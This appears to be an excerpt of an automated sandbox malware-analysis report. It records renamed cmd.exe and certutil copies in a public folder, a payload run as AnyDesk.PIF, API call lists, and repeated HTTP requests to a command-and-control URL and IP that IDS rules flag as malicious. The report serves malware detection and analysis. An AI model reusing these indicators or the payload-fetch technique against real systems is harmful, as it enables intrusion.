      Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1694923446.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1698590707.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1703554618.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1717188834.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1718131539.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1719120301.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1719455704.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1720271096.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
      Source: Binary string: certutil.pdb source: kn.exe, 00000006.00000000.1699078959.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1702405563.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1704266482.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1716584582.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
      Source: Binary string: cmd.pdb source: alpha.exe, 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1694923446.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1698590707.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1703554618.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1717188834.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1718131539.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1719120301.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1719455704.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1720271096.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
      Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 00000009.00000003.1720468167.0000000002927000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1719853566.000000007FA90000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1720758818.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2942456888.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2941867830.0000000002921000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000000.1699078959.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1702405563.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1704266482.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1716584582.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
      Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF7E1DC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose
      Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF7E1DC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove
      Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF7E1DB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose
      Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF7E1DB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
      Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF7E1DD7B4C FindFirstFileW,FindNextFileW,FindClose
      Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF7E1DC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose
      Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF7E1DC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove
      Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF7E1DB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose
      Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF7E1DB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
      Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF7E1DD7B4C FindFirstFileW,FindNextFileW,FindClose
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C535E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5919F8 #359,FindFirstFileW,FindNextFileW,FindClose
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C591B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C53DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C573674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C53B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C53D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4FD440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C596F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C593100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5910C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C52C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C59234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose
      Source: C:\Users\Public\Libraries\AnyDesk.PIF | Code function: 9_2_02B65908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA
      Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7E1DC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose
      Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7E1DC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove
      Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7E1DB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose
      Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7E1DB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
      Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7E1DD7B4C FindFirstFileW,FindNextFileW,FindClose

      Networking

      Source: Malware configuration extractor | URLs: https://vandeytas.ru.com/233_Hlvzmhuinff
      Source: C:\Users\Public\Libraries\AnyDesk.PIF | Code function: 9_2_02B7E4B8 InternetCheckConnectionA
      Source: Joe Sandbox View | IP Address: 50.7.187.218
      Source: Joe Sandbox View | ASN Name: COGENT-174US
      Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49779 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49765 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49781 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49783 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49759 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49763 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49769 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49771 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49773 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49785 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49777 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49767 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49796 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49789 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49810 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49824 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49775 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49817 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49761 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49838 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49831 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49866 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49881 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49852 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49859 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49876 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49900 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49907 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49914 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49921 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49935 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49928 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49962 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49976 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49942 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49845 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49990 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49870 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49955 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49949 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49887 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49803 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49894 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49969 -> 50.7.187.218:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49983 -> 50.7.187.218:443
      Source: global traffic | HTTP traffic detected (55 identical requests): GET /233_Hlvzmhuinff HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: vandeytas.ru.com
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global traffic | DNS traffic detected: DNS query: vandeytas.ru.com
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 26 Nov 2024 08:38:48 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
      Source: kn.exe | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
      Source: kn.exe, 00000006.00000000.1699078959.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1702405563.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1704266482.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1716584582.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
      Source: AnyDesk.PIF, AnyDesk.PIF, 00000009.00000002.2941867830.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1720468167.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2957250885.000000007F9FF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1720758818.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2942456888.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.pmail.com
      Source: kn.exe | String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
      Source: kn.exe, 00000006.00000000.1699078959.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1702405563.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1704266482.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1716584582.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr | String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
      Source: kn.exe | String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
      Source: kn.exe | String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
      Source: kn.exe | String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
      Source: kn.exe | String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
      Source: kn.exe, 00000006.00000000.1699078959.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1702405563.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1704266482.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1716584582.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr | String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
      Source: kn.exe | String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
      Source: AnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vandeytas.ru.com/

      E-Banking Fraud

      Source: C:\Users\Public\kn.exe  Code function: 6_2_00007FF67C5660BC CertCreateCertificateContext,GetLastError,#357,CertAddCertificateContextToStore,GetLastError,#357,CertCompareCertificateName,CertOpenStore,GetLastError,CertAddCertificateContextToStore,GetLastError,CertFreeCertificateContext,CertCloseStore,6_2_00007FF67C5660BC
      Source: C:\Users\Public\kn.exe  Code function: 6_2_00007FF67C4DF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,6_2_00007FF67C4DF9B8
      Source: C:\Users\Public\kn.exe  Code function: 6_2_00007FF67C4EFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,6_2_00007FF67C4EFC20
      Source: C:\Users\Public\kn.exe  Code function: 6_2_00007FF67C5898B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF67C5898B0
      Source: C:\Users\Public\kn.exe  Code function: 6_2_00007FF67C54184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,6_2_00007FF67C54184C
